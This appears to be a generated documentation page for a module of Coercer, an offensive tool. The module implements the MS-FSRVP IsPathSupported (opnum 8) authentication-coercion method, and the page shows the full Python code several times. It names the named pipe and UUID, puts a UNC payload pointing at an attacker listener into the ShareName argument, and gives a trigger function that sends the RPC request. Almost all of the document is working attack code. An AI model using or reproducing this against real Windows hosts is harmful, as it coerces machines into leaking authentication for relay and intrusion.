coercer.methods.MS_FSRVP.IsPathSupported
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : IsPathSupported.py 4# Author : Podalirius (@podalirius_) 5# Date created : 15 Sep 2022 6 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 8from coercer.network.DCERPCSessionError import DCERPCSessionError 9from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 10from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 11 12 13class _IsPathSupported(NDRCALL): 14 """ 15 Structure to make the RPC call to IsPathSupported() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b) 16 """ 17 opnum = 8 18 structure = ( 19 ('ShareName', WSTR), # Type: LPWSTR 20 ) 21 22 23class _IsPathSupportedResponse(NDRCALL): 24 """ 25 Structure to parse the response of the RPC call to IsPathSupported() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b) 26 """ 27 structure = () 28 29 30class IsPathSupported(MSPROTOCOLRPCCALL): 31 """ 32 Coercing a machine to authenticate using function IsPathSupported (opnum 8) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b) 33 34 Method found by: 35 - [@topotam77](https://twitter.com/topotam77) 36 """ 37 38 exploit_paths = [ 39 ("smb", '\\\\{{listener}}\x00') 40 ] 41 42 access = { 43 "ncan_np": [ 44 { 45 "namedpipe": r"\PIPE\Fssagentrpc", 46 "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292", 47 "version": "1.0" 48 } 49 ], 50 "ncacn_ip_tcp": [ 51 { 52 "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292", 53 "version": "1.0" 54 } 55 ] 56 } 57 58 protocol = { 59 "longname": "[MS-FSRVP]: File Server Remote VSS Protocol", 60 "shortname": "MS-FSRVP" 61 } 62 63 function = { 64 "name": "IsPathSupported", 65 "opnum": 8, 66 "vulnerable_arguments": ["ShareName"] 67 } 68 69 def trigger(self, dcerpc_session, target): 70 if dcerpc_session is not None: 71 try: 72 request = _IsPathSupported() 73 request['ShareName'] = self.path 74 resp = dcerpc_session.request(request) 75 return "" 76 except Exception as err: 77 return err 78 else: 79 print("[!] Error: dce is None, you must call connect() first.") 80 return None
31class IsPathSupported(MSPROTOCOLRPCCALL): 32 """ 33 Coercing a machine to authenticate using function IsPathSupported (opnum 8) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b) 34 35 Method found by: 36 - [@topotam77](https://twitter.com/topotam77) 37 """ 38 39 exploit_paths = [ 40 ("smb", '\\\\{{listener}}\x00') 41 ] 42 43 access = { 44 "ncan_np": [ 45 { 46 "namedpipe": r"\PIPE\Fssagentrpc", 47 "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292", 48 "version": "1.0" 49 } 50 ], 51 "ncacn_ip_tcp": [ 52 { 53 "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292", 54 "version": "1.0" 55 } 56 ] 57 } 58 59 protocol = { 60 "longname": "[MS-FSRVP]: File Server Remote VSS Protocol", 61 "shortname": "MS-FSRVP" 62 } 63 64 function = { 65 "name": "IsPathSupported", 66 "opnum": 8, 67 "vulnerable_arguments": ["ShareName"] 68 } 69 70 def trigger(self, dcerpc_session, target): 71 if dcerpc_session is not None: 72 try: 73 request = _IsPathSupported() 74 request['ShareName'] = self.path 75 resp = dcerpc_session.request(request) 76 return "" 77 except Exception as err: 78 return err 79 else: 80 print("[!] Error: dce is None, you must call connect() first.") 81 return None
Coercing a machine to authenticate using function IsPathSupported (opnum 8) of MS-FSRVP Protocol
Method found by:
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\Fssagentrpc', 'uuid': 'a8e0653c-2744-4389-a61d-7373df8b2292', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'a8e0653c-2744-4389-a61d-7373df8b2292', 'version': '1.0'}]}
def
trigger(self, dcerpc_session, target):
70 def trigger(self, dcerpc_session, target): 71 if dcerpc_session is not None: 72 try: 73 request = _IsPathSupported() 74 request['ShareName'] = self.path 75 resp = dcerpc_session.request(request) 76 return "" 77 except Exception as err: 78 return err 79 else: 80 print("[!] Error: dce is None, you must call connect() first.") 81 return None